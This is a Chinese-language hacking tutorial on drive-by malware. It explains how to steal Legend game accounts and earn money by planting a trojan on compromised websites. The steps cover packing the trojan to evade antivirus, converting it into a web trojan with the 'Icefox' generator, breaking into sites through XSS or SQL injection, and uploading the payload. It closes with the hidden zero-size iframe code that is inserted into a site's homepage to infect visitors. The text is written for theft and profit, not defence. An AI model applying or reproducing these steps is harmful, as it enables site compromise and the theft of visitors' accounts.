活学活用--------------------挂马步步行

MILY: 宋体; mso-bidi-font-size: 10.5pt; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">在网上有不少的网友想要盗些传奇号,或者通过给别人挂木马赚点钱,但是却又无从下手,下面,让我来介绍介绍怎么让自己的技术不荒废,而且还能通过黑站得到一点的报酬.

活学活用--------------------挂马步步行

                                               图/文  灵鸠剑客

先在网上找一个好一点的传奇木马，然后将生成的木马转换成htm格式，具体步骤如下：首先准备好，网页木马转换工具，和生成好的传奇木马，和一个加壳工具，当然，如果你确信你的木马是免查杀的，可以不用加壳和修改标识符。然后给木马加壳（如图一，二）

（图一：选择将要加壳的程序和输出的名称）

（图二：加壳完毕）

然后接下来就将传奇木马转换成网页木马，将加过壳后的喘气木马放入与“冰狐浪子网页木马生成器.js”同一目录下然后改名为”#.exe”（注意：没有双引号），然后双击“冰狐浪子网页木马生成器.js”，接下来会在同一文件夹里面生成两个文件，一个是“icyfox.htm”一个是“icefox.js”，只要把两个放在同一目录就可以运行这个js脚本了。然后在网上随便的逛一逛，查查有没有什么有点意思的站点，然后找到一些有漏洞可以利用的站点，比如：论坛里面的htm功能没有被关闭，跨站漏洞，sql注入漏洞，等等，因为这类漏洞比较多，当得到了一个站的webshell的时候，大家想到的当然是提升权限，但提升权限的文章和方法也有很多了，而提升权限之后又怎么办呢？下面我就主要介绍一下当得到后台权限之后该如何去挂自己的传奇木马上去，当得到了服务器管理员权限之后，接下来就是在上面挂马了，先将文件夹里的“icyfox.htm”的文件名改成别的，比如“ljjk.htm”等等，如果想改“icyfox.js”，就要将“icyfox.htm”里面的代码稍做改动，然后就可以上传到自己的空间里了，一定要放在同一目录，如果没有自己的空间的朋友，上传到服务器上面当然也是可以的，（如图三）

（图三：上传网页木马）

上传成功后，只要改一改特的首页的源代码就可以，在里面加入如下代码：

<iframe src=”你刚才传上去的icyfox.htm的路径” width=”0” height = ”0” frameborder = ”no” border = ”0” marginwidth = ”0” marginheight =”0” scrolling =”no”>